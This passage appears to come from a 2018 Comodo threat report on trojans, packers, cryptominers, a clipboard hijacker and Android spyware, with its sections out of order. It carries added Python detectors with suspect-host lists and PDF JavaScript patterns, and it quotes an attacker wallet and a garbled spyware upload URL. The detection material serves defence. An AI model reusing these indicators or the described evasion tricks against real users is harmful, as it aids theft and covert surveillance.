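# "#xx" inside a name is a hex escape, so /J#61vaScript is the same name as /JavaScript.
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw):
    """Resolve #xx escapes so obfuscated names compare equal to their plain spelling."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def triage(pdf_bytes):
    """Return risky-name hits, an obfuscation flag and a score for one PDF given as bytes."""
    raw_names = NAME_RE.findall(pdf_bytes)
    counts = Counter(decode_name(n) for n in raw_names)
    hits = {n.decode(): counts[n] for n in RISKY_NAMES if counts[n]}
    score = sum(RISKY_NAMES[n] * c for n, c in counts.items() if n in RISKY_NAMES)
    # A risky name written only in escaped form is itself a strong evasion signal.
    obfuscated = any(b"#" in n and decode_name(n) in RISKY_NAMES for n in raw_names)
    return {
        "hits": hits,
        "score": score,
        "obfuscated_names": obfuscated,
        # Names inside compressed object streams are invisible to a raw byte scan.
        "has_object_streams": counts[b"ObjStm"] > 0,
        "verdict": "suspicious" if score >= 3 or obfuscated else "clean",
    }


# Constructed minimal PDFs for the example (not real samples).
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /J#61vaScript /JS (app.alert('pwned')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        print(label, triage(doc))
```

Treat a "clean" verdict as provisional whenever has_object_streams is true: a document that keeps its catalog inside a FlateDecode object stream hides every name from this scan, and the file has to be inflated with a real PDF parser before the keyword counts mean anything.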
Japan and India were the two countries where Comodo detected the majority of exploit activity in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructors
Constructors are applications used to generate malware files automatically.
In Q2 Alamar was the top constructor that Comodo detected; Microsoft classifies this program as a "severe" threat to PC users.
In Q2 Germany (de) was the top country of detection for constructors.
And the timeline shows not only that Germany had a serious problem with constructors in Q2 but also that this malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means of hiding or obfuscating malicious executable code by compressing (or "packing") it inside a wrapper that looks like innocuous software or data; the hostile code can even be a script. The packed file carries its own decompression stub, or is a self-extracting archive, which recreates the original code from the compressed data at run time and then executes the malware. Encryption may also be layered in to conceal the malware from security software as another means of obfuscating the attack.
MUPX, the label for executables packed with a modified "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous executable formats and operating systems, and its UCL compression algorithm needs a decompressor only a few hundred bytes long, which is why the packed stub is so small. In practice a "modified" UPX is one whose headers or stub have been tampered with so that the stock unpacker no longer recognizes the file, even though the compression itself is unchanged.
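The section-table and entropy checks an analyst would run to spot a UPX-packed or "modified UPX" executable, added as an example for this edition (not Comodo's detection logic and not part of the original report): it parses the PE section headers and flags stock UPX section names, an empty first section that only reserves address space for the unpacked image, and any section whose byte entropy is close to 8 bits. The three PE skeletons are constructed inline with the builder shown, the 7.0-bit threshold is an assumption, and deterministic pseudo-random bytes stand in for compressed code.

```python
import math
import random
import struct
from collections import Counter

SECTION_FMT = "<8sIIIIIIHHI"            # IMAGE_SECTION_HEADER (40 bytes)
SECTION_SIZE = struct.calcsize(SECTION_FMT)


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant data, near 8.0 for compressed or encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe):
    """Walk the PE section table and return [(name, virtual_size, raw_bytes), ...]."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]      # IMAGE_FILE_HEADER.NumberOfSections
    opt_header_size = struct.unpack_from("<H", pe, coff + 16)[0]  # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    table = coff + 20 + opt_header_size
    sections = []
    for i in range(num_sections):
        name, vsize, _va, rsize, rptr = struct.unpack_from(SECTION_FMT, pe, table + i * SECTION_SIZE)[:5]
        sections.append((name.rstrip(b"\0").decode("latin-1"), vsize, pe[rptr:rptr + rsize]))
    return sections


def packer_findings(pe, entropy_threshold=7.0):
    """Heuristics for a UPX-style packer: section names, an empty unpack area, high entropy."""
    findings = []
    for name, vsize, raw in parse_sections(pe):
        if name.upper().startswith("UPX"):
            findings.append(f"{name}: stock UPX section name")
        if not raw and vsize >= 0x1000:
            findings.append(f"{name}: no raw data but {vsize:#x} bytes reserved (unpack destination)")
        if raw and shannon_entropy(raw) > entropy_threshold:
            findings.append(f"{name}: entropy {shannon_entropy(raw):.2f} (compressed or encrypted)")
    return findings


def build_pe(sections):
    """Assemble a minimal PE skeleton with the given sections (constructed test data, not a runnable binary)."""
    n, opt_size, e_lfanew = len(sections), 0xE0, 0x40
    headers_end = e_lfanew + 4 + 20 + opt_size + n * SECTION_SIZE
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)   # i386, executable image
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)             # PE32 magic, rest zeroed
    table, body, va = b"", b"", 0x1000
    for name, vsize, raw in sections:
        rptr = headers_end + len(body) if raw else 0
        table += struct.pack(SECTION_FMT, name, vsize, va, len(raw), rptr, 0, 0, 0, 0, 0)
        body += raw
        va += max(vsize, 0x1000)
    return dos + b"PE\0\0" + coff + opt + table + body


# Constructed samples: seeded pseudo-random bytes stand in for compressed code.
_rng = random.Random(2018)
RANDOM_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAIN_CODE = b"\x55\x8b\xec\x90" * 1024        # repetitive, low-entropy filler

CLEAN_PE = build_pe([(b".text", 0x1000, PLAIN_CODE), (b".data", 0x1000, b"\0" * 512)])
UPX_PE = build_pe([(b"UPX0", 0x20000, b""), (b"UPX1", 0x2000, RANDOM_BLOB)])
RENAMED_UPX_PE = build_pe([(b".text", 0x20000, b""), (b".data", 0x2000, RANDOM_BLOB)])

if __name__ == "__main__":
    for label, pe in (("clean", CLEAN_PE), ("upx", UPX_PE), ("renamed", RENAMED_UPX_PE)):
        print(label, packer_findings(pe) or ["no packer indicators"])
```

The third sample is the point of the exercise: renaming UPX0/UPX1 to .text/.data defeats the name check, which is what a "modified UPX" relies on, but the empty first section and the near-8-bit entropy of the second still give it away. Entropy alone also fires on legitimately encrypted resources or compressed installers, so treat it as a triage signal rather than a verdict.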
In Q2 2018 Russia was the number one home of malware packers.
The timeline shows that Russia had the most persistent packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooders
Email flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one email flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And the timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual tools are programs that can modify or alter malicious files to avoid detection.
The top virtual tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for virtual tool detections were Germany and the US.
The timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period.
Such malware is typically labeled only a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for joke malware.
The timeline shows that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nevertheless detects and flags them as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.
The bubble chart shows that the US and Mexico were the most common countries in which Comodo detected these types of applications.
And finally, the timeline shows that, far from being a rare occurrence, such software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application category is alarming in that users often install these applications inadvertently in the course of everyday computer and Internet activity. They include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.
The most common unwanted application Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users may not have intended. Such programs include free toolbars, adware and "system optimizers".
As the bubble chart shows, the US was far and away the most common country of detection for unwanted applications in Q2 2018.
And as the timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. They often claim to help users with administrative or security functionality but do the opposite; examples include fake antivirus and free Internet Relay Chat (IRC) clients.
The most common unsafe application Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed together with additional malware that users install inadvertently.
This malware type is a bit different in that while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are number two and three respectively.
The timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. The diagram further lists the number one malware family for each vertical's top malware type.
Let us take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let us examine "Zbot", another name for the "Zeus" trojan that has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out. What happened on that day in the US that might help explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for the dramatic rise in malware detections is that intelligence agencies around the world suddenly received a raft of new collection requirements: many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is likely that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan detections in South Korea during Q2 2018. The highest single spikes took place at the same time as the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to connect better with the outside world. Comodo researched the detected malware further and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that almost all activities, from social life to business, politics and national security affairs, are now performed online. This is especially true during times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojans, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider; both might be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been several reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let us look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland revealed that it took place almost exclusively in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2 Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but also presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out against other cryptominers with a "kill list" feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.
In this way, CoinMiner has the victim's computer to itself and uses its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2, these cryptominers learned to hide. CoinHive is the clearest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and in cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we can find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
The next malware in the row prefers stealing cryptocurrency on the fly to mining it.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
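The camouflage described above has two observable traits a page auditor can key on: an encoded blob that only becomes an iframe after decoding, and an iframe sized 1x1 whose destination is a shortener such as cnhv.co rather than the CoinHive host itself. The following script is an added illustration, not code from the report or from CoinHive; it assumes the page-side obfuscation is a base64 string handed to atob(), and the sample page, the shortcode EXAMPLE in the shortener URL, and the function names are constructed for this example. It unpacks the encoded layers, parses every iframe it finds at any depth, and flags those that are tiny or point at a known miner-related host.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts the report associates with the hidden-iframe CoinHive trick.
SUSPECT_HOSTS = {"cnhv.co", "coinhive.com"}

# Assumption: the obfuscated payload is a base64 literal passed to atob().
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"([A-Za-z_-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")


def decode_layers(html, max_depth=5):
    """Return the raw markup followed by each base64 layer it unpacks."""
    layers = [html]
    frontier = html
    for _ in range(max_depth):
        decoded = []
        for blob in ATOB_RE.findall(frontier):
            try:
                decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
            except ValueError:
                continue  # not valid base64, leave it alone
        if not decoded:
            break
        frontier = "\n".join(decoded)
        layers.append(frontier)
    return layers


def parse_attrs(attr_text):
    """Turn an iframe's attribute string into a lowercase name -> value dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        name = m.group(1).lower()
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[name] = value
    return attrs


def _dimension(value):
    digits = re.match(r"\d+", value or "")
    return int(digits.group()) if digits else None


def find_hidden_miners(html):
    """List iframes that are near-invisible or point at a known miner host.

    Each finding records the decoding depth at which the iframe surfaced, so an
    analyst can tell a plain iframe (depth 0) from one hidden behind atob().
    """
    findings = []
    for depth, layer in enumerate(decode_layers(html)):
        for m in IFRAME_RE.finditer(layer):
            attrs = parse_attrs(m.group(1))
            host = (urlparse(attrs.get("src", "")).hostname or "").lower()
            width, height = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
            tiny = width is not None and height is not None and width <= 1 and height <= 1
            known = host in SUSPECT_HOSTS
            if tiny or known:
                findings.append({"depth": depth, "host": host, "tiny": tiny, "known_host": known})
    return findings


# Constructed sample: a 1x1 iframe to the shortener, wrapped in base64 and
# written via document.write(atob(...)). EXAMPLE is a placeholder shortcode.
INNER_IFRAME = '<iframe src="https://cnhv.co/EXAMPLE" width="1" height="1"></iframe>'
SAMPLE_PAGE = (
    "<html><body><p>Nothing to see here.</p>\n"
    "<script>document.write(atob('%s'));</script>\n"
    "</body></html>" % base64.b64encode(INNER_IFRAME.encode()).decode()
)

if __name__ == "__main__":
    for finding in find_hidden_miners(SAMPLE_PAGE):
        print(finding)
```

Searching the raw markup for "coinhive" would miss this page entirely; the finding only appears at depth 1, after decoding, which is exactly the gap the report's scenario exploits. In practice the same check should be run on every script a page loads, not just the inline HTML.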
Cryptocurrency transfers require a wallet address. The address is a long string made up of assorted characters and numbers, so it is almost impossible to remember or to type in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The Cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
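The defensive counterpart of the substitution described above is to compare what the user actually copied with what the clipboard holds at paste time, and to raise an alarm when two different address-like strings are involved. The script below is an added example, not part of the report or of any product; it models the clipboard as a constructed list of observations (a real monitor would hook the OS clipboard), uses the two addresses the report quotes, and checks address shape only (prefix and Base58 alphabet), not the Base58Check checksum. The function and constant names are this example's own.

```python
import re

# Legacy Bitcoin address shape: version prefix 1 (P2PKH) or 3 (P2SH) followed by
# 25-34 Base58 characters (the alphabet omits 0, O, I and l). Shape only; the
# Base58Check checksum is deliberately not verified here.
BTC_LEGACY_RE = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")

# The substitution shown in the report (addresses quoted from it).
COPIED_BY_USER = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
PASTED_BY_MALWARE = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"


def looks_like_btc_address(text):
    """True if the string has the shape of a legacy Bitcoin address."""
    return bool(BTC_LEGACY_RE.match(text.strip()))


def address_kind(addr):
    """Map the version prefix to the script type it denotes."""
    return {"1": "P2PKH", "3": "P2SH"}.get(addr[:1], "unknown")


def audit_clipboard(events):
    """Walk clipboard observations and return one alert per detected swap.

    events: list of (source, value). 'user' marks a value the user copied;
    'read' marks what an application found in the clipboard when the user
    pasted. A swap is an address-like value at paste time that differs from
    the address-like value the user last copied.
    """
    alerts = []
    last_user_copy = None
    for source, value in events:
        if source == "user":
            last_user_copy = value
        elif source == "read" and last_user_copy is not None:
            if (looks_like_btc_address(last_user_copy)
                    and looks_like_btc_address(value)
                    and value != last_user_copy):
                alerts.append({
                    "expected": last_user_copy,
                    "found": value,
                    # A prefix change (3... to 1...) is the clue a careful user might notice.
                    "kind_changed": address_kind(last_user_copy) != address_kind(value),
                })
    return alerts


# Constructed event trace reproducing the report's example: ordinary text
# passes through untouched, then the wallet address is swapped before paste.
SAMPLE_EVENTS = [
    ("user", "meeting notes for Tuesday"),
    ("read", "meeting notes for Tuesday"),
    ("user", COPIED_BY_USER),
    ("read", PASTED_BY_MALWARE),
]

if __name__ == "__main__":
    for alert in audit_clipboard(SAMPLE_EVENTS):
        print("clipboard substitution: expected %(expected)s, found %(found)s "
              "(address type changed: %(kind_changed)s)" % alert)
```

The same comparison is what wallet software can do for the user: show the pasted address next to the one on the payee's page and refuse to send when they differ. Because the hijacker only rewrites strings that already look like addresses, ordinary copy-paste traffic produces no alerts.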
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician, or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions.
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts, id, name, phone numbers, and the email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type), and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server: httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps, and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls, and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Social networks were another means of disseminating the malware.
Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio, and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata, and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions.
Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
